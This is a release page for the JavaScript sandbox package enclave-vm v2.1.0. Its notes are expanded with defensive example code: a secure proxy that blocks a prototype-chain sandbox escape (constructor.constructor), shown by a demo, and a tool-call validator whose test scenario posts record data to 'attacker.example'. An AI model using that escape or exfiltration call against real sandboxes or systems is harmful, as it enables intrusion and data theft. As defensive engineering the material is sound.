
enclave-vm@2.1.0


github-actions released this 05 Jan 01:31
6b58618

enclave-vm v2.1.0

📦 npm: enclave-vm@2.1.0


Added

  • Default double VM layer with parent/inner VMs, operation validation, rate limiting, and suspicious-pattern detection (libs/enclave-vm/src/double-vm/**/*).
  • Configurable doubleVm options plus exported DoubleVmConfig/ParentValidationConfig so callers can tune the parent validation stage (libs/enclave-vm/src/types.ts, libs/enclave-vm/src/enclave.ts).
  • AST validation preset selection via the new preset option covering agentscript/strict/secure/standard/permissive modes (libs/enclave-vm/src/enclave.ts, libs/enclave-vm/src/index.ts).
  • Reference helpers such as BlockedPropertyCategory and REF_ID_SUFFIX are now exported for consumers that integrate with the reference sidecar (libs/enclave-vm/src/types.ts, libs/enclave-vm/src/sidecar/reference-config.ts).

Changed

  • Breaking: Enclave now routes execution through the double VM wrapper by default and only falls back to raw adapters when doubleVm.enabled is explicitly set to false; opting out also bypasses the parent-VM operation validation, rate limiting, and suspicious-pattern checks that the wrapper provides (libs/enclave-vm/src/enclave.ts).
  • Custom globals injected into the VM are automatically wrapped in secure proxies to block prototype-chain attacks (libs/enclave-vm/src/adapters/vm-adapter.ts).
  • clearProxyCache() now throws when called, so that callers still depending on it fail loudly; the API is unsupported and no longer needed (libs/enclave-vm/src/secure-proxy.ts).
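To make the prototype-chain point above concrete, here is an added, stand-alone secure-proxy wrapper in the style a sandbox would use when injecting a host object as a custom global. It is illustrative code written for these notes, not enclave-vm's secure-proxy.ts: the blocked-property list, the BlockedPropertyError class, and the hostGlobal sample are assumptions. The escape it blocks is the classic one: from any host object, `.constructor.constructor` reaches the host realm's Function constructor, which compiles arbitrary host code.

```javascript
// Added example (not enclave-vm code): a secure proxy that mediates every
// access to an injected host object and refuses the properties untrusted code
// uses to walk the prototype chain back to the host realm.

const BLOCKED_PROPERTIES = new Set([               // assumed block-list
  '__proto__', 'constructor', 'prototype',
  '__defineGetter__', '__defineSetter__', '__lookupGetter__', '__lookupSetter__',
]);

class BlockedPropertyError extends Error {
  constructor(prop) {
    super(`access to blocked property "${String(prop)}" denied`);
    this.name = 'BlockedPropertyError';
  }
}

const isBlocked = (prop) => typeof prop === 'string' && BLOCKED_PROPERTIES.has(prop);

// Wrap a host value so every path through it goes via the proxy. Primitives pass
// through unchanged; nested objects are wrapped on access; host functions are
// replaced by a wrapper that invokes them on the raw target and wraps the result.
// The WeakMap cache yields one proxy per host object.
function secureProxy(target, cache = new WeakMap()) {
  if (target === null || (typeof target !== 'object' && typeof target !== 'function')) {
    return target;
  }
  if (cache.has(target)) return cache.get(target);

  const proxy = new Proxy(target, {
    get(t, prop) {
      if (isBlocked(prop)) throw new BlockedPropertyError(prop);
      const value = Reflect.get(t, prop, t);
      if (typeof value === 'function') {
        return (...args) => secureProxy(Reflect.apply(value, t, args), cache);
      }
      return secureProxy(value, cache);
    },
    set(t, prop, value) {
      if (isBlocked(prop)) throw new BlockedPropertyError(prop);
      return Reflect.set(t, prop, value);
    },
    has(t, prop) {
      return !isBlocked(prop) && Reflect.has(t, prop);
    },
    defineProperty(t, prop, desc) {
      if (isBlocked(prop)) throw new BlockedPropertyError(prop);
      return Reflect.defineProperty(t, prop, desc);
    },
    deleteProperty(t, prop) {
      if (isBlocked(prop)) throw new BlockedPropertyError(prop);
      return Reflect.deleteProperty(t, prop);
    },
    // Object.getPrototypeOf(x).constructor is another route to the host realm,
    // so hide the chain. The Proxy invariant requires the real prototype for a
    // non-extensible target, so only extensible targets are hidden.
    getPrototypeOf(t) {
      return Object.isExtensible(t) ? null : Reflect.getPrototypeOf(t);
    },
    setPrototypeOf() {
      throw new BlockedPropertyError('[[SetPrototypeOf]]');
    },
    apply(t, _thisArg, args) {
      return secureProxy(Reflect.apply(t, undefined, args), cache);
    },
    construct() {
      throw new BlockedPropertyError('[[Construct]]');
    },
  });
  cache.set(target, proxy);
  return proxy;
}

// Stand-in for untrusted sandbox code: walk value.constructor.constructor to
// the host Function constructor and compile arbitrary host code with it.
function attemptEscape(injectedGlobal) {
  try {
    const HostFunction = injectedGlobal.constructor.constructor;
    return { escaped: true, result: HostFunction('return 6 * 7')() };
  } catch (err) {
    return { escaped: false, error: err.name };
  }
}

// Constructed host object of the kind a caller might inject as a custom global.
const hostGlobal = {
  appName: 'demo',
  limits: { maxItems: 10 },
  greet(name) { return `hello ${name}`; },
};

function demo() {
  const guarded = secureProxy(hostGlobal);
  return {
    raw: attemptEscape(hostGlobal),            // { escaped: true, result: 42 }
    proxied: attemptEscape(guarded),           // { escaped: false, error: 'BlockedPropertyError' }
    normalAccess: guarded.limits.maxItems,     // 10: ordinary properties still work
    methodCall: guarded.greet('agent'),        // 'hello agent': methods still work
    protoHidden: Object.getPrototypeOf(guarded) === null,
    constructorVisible: 'constructor' in guarded,   // false
  };
}
```

Two caveats worth knowing. The trap sees the resolved property name, so `obj['constr' + 'uctor']` is caught just like `obj.constructor`; but a frozen host object would need the `get` trap to return the original function rather than a wrapper, because Proxy invariants forbid substituting a non-writable, non-configurable property. And a proxy only mediates paths that start at the wrapped object; anything that hands the sandbox a raw host function by another route is outside its reach, which is what the parent-VM layer is for.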

Removed

  • Removed the unused allowFunctionBinding option from SecureProxyOptions; function binding is always handled by the proxy rules (libs/enclave-vm/src/secure-proxy.ts).

Fixed

  • Pattern serialization and suspicious-pattern plumbing now reject unsafe detector bodies, handle JSON.stringify failures, and preserve error causes when bubbling through the parent VM (libs/enclave-vm/src/double-vm/suspicious-patterns.ts, libs/enclave-vm/src/double-vm/double-vm-wrapper.ts).

Security

  • Parent VM suspicious-pattern detectors block data exfiltration, enumeration, credential leaks, and bulk operations before tool calls reach the host (libs/enclave-vm/src/double-vm/suspicious-patterns.ts, libs/enclave-vm/src/double-vm/parent-vm-bootstrap.ts).
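The following is an added example of the kind of parent-stage gate the Added and Security entries describe: a sliding-window rate limiter plus detectors for credential leaks, bulk operations, enumeration and exfiltration, run over a constructed sequence of tool calls. It is written for these notes and is not enclave-vm's suspicious-patterns.ts or parent-vm-bootstrap.ts; the tool names (readRecord, httpPost, deleteRecords, listRecords), thresholds, the egress allow-list and the sample calls are all assumptions.

```javascript
// Added example (not enclave-vm code): a parent-stage validator that gates tool
// calls from untrusted inner code before they reach the host.

const ALLOWED_HOSTS = new Set(['api.internal.example']);   // assumed egress allow-list
const OUTBOUND_TOOLS = new Set(['httpPost']);               // assumed tools that send data off-host
const ENUM_THRESHOLD = 5;    // distinct records read in a row before it counts as enumeration
const BULK_THRESHOLD = 50;   // max items one mutating call may touch
const CREDENTIAL_KEY = /(api[-_]?key|secret|token|password|authorization)/i;

class SlidingWindowRateLimiter {
  constructor(maxCalls, windowMs) {
    this.maxCalls = maxCalls; this.windowMs = windowMs; this.timestamps = [];
  }
  // Records the attempt and returns false once the window is full.
  tryAcquire(now) {
    const cutoff = now - this.windowMs;
    while (this.timestamps.length && this.timestamps[0] <= cutoff) this.timestamps.shift();
    if (this.timestamps.length >= this.maxCalls) return false;
    this.timestamps.push(now);
    return true;
  }
}

// Visit every string leaf of a JSON-like value together with the key it sits under.
function walkStrings(value, visit, key = '') {
  if (typeof value === 'string') visit(key, value);
  else if (Array.isArray(value)) value.forEach((v) => walkStrings(v, visit, key));
  else if (value && typeof value === 'object') Object.entries(value).forEach(([k, v]) => walkStrings(v, visit, k));
}

// Heuristic for secret-looking values: AWS access key ids, JWTs, long opaque tokens.
const looksLikeSecret = (s) =>
  /^AKIA[0-9A-Z]{16}$/.test(s) || /^eyJ[\w-]+\.[\w-]+\./.test(s) || /^[\w+/=-]{32,}$/.test(s);

// Detectors see the current call and the history of earlier attempts (blocked ones
// included, since intent matters) and return a reason string or null.
function credentialLeak(call) {
  if (!OUTBOUND_TOOLS.has(call.tool)) return null;
  let hit = null;
  walkStrings(call.args, (key, str) => {
    if (!hit && (CREDENTIAL_KEY.test(key) || looksLikeSecret(str))) hit = `secret-looking value under "${key}"`;
  });
  return hit;
}
function bulkOperation(call) {
  const n = Array.isArray(call.args.ids) ? call.args.ids.length : 0;
  return n > BULK_THRESHOLD ? `${call.tool} touches ${n} items (limit ${BULK_THRESHOLD})` : null;
}
function enumeration(call, history) {
  if (call.tool !== 'readRecord') return null;
  const recent = history.filter((c) => c.tool === 'readRecord').slice(-(ENUM_THRESHOLD - 1));
  const ids = new Set([...recent.map((c) => c.args.id), call.args.id]);
  return ids.size >= ENUM_THRESHOLD ? `${ids.size} distinct records read in sequence` : null;
}
function exfiltration(call, history) {
  if (call.tool !== 'httpPost') return null;
  const host = new URL(call.args.url).hostname;
  const readBefore = history.some((c) => c.tool === 'readRecord');
  return readBefore && !ALLOWED_HOSTS.has(host) ? `POST to ${host} after record reads` : null;
}
const detectors = { 'credential-leak': credentialLeak, 'bulk-operation': bulkOperation, enumeration, exfiltration };

class ParentValidator {
  constructor({ maxCalls = 6, windowMs = 1000 } = {}) {
    this.limiter = new SlidingWindowRateLimiter(maxCalls, windowMs);
    this.history = [];
  }
  // Returns { allowed: true } or { allowed: false, detector, reason }.
  validate(call, now) {
    let decision = { allowed: true };
    if (!this.limiter.tryAcquire(now)) {
      decision = { allowed: false, detector: 'rate-limit', reason: `over ${this.limiter.maxCalls} calls per ${this.limiter.windowMs} ms` };
    } else {
      for (const [name, check] of Object.entries(detectors)) {
        const reason = check(call, this.history);
        if (reason) { decision = { allowed: false, detector: name, reason }; break; }
      }
    }
    this.history.push(call);
    return decision;
  }
}

// Constructed sequence of tool calls an inner-VM script might attempt, with
// millisecond timestamps. Returns one label per call: 'ok' or the detector name.
function runScenario() {
  const internal = 'https://api.internal.example/ingest';
  const calls = [
    [0, { tool: 'readRecord', args: { id: 'r1' } }],
    [100, { tool: 'readRecord', args: { id: 'r2' } }],
    [200, { tool: 'httpPost', args: { url: internal, body: 'weekly summary' } }],
    [300, { tool: 'httpPost', args: { url: 'https://attacker.example/collect', body: 'r1=alice;r2=bob' } }],
    [400, { tool: 'httpPost', args: { url: internal, headers: { Authorization: 'Bearer abc' } } }],
    [500, { tool: 'deleteRecords', args: { ids: Array.from({ length: 51 }, (_, i) => `r${i}`) } }],
    [2000, { tool: 'readRecord', args: { id: 'r3' } }],
    [2100, { tool: 'readRecord', args: { id: 'r4' } }],
    [2200, { tool: 'readRecord', args: { id: 'r5' } }],
    [2300, { tool: 'listRecords', args: {} }],
    [2400, { tool: 'listRecords', args: {} }],
    [2500, { tool: 'listRecords', args: {} }],
    [2600, { tool: 'listRecords', args: {} }],
  ];
  const validator = new ParentValidator();
  return calls.map(([t, call]) => { const d = validator.validate(call, t); return d.allowed ? 'ok' : d.detector; });
}
```

The scenario yields `ok, ok, ok, exfiltration, credential-leak, bulk-operation, ok, ok, enumeration, ok, ok, ok, rate-limit`. Two design choices matter for a gate like this. It runs in the parent VM rather than the inner one so that inner code cannot redefine the detectors or the limiter (this stand-alone version runs in the host purely for demonstration), and every attempt, blocked or not, is recorded against the rate budget and the history, so a script that keeps probing burns its allowance rather than getting free retries.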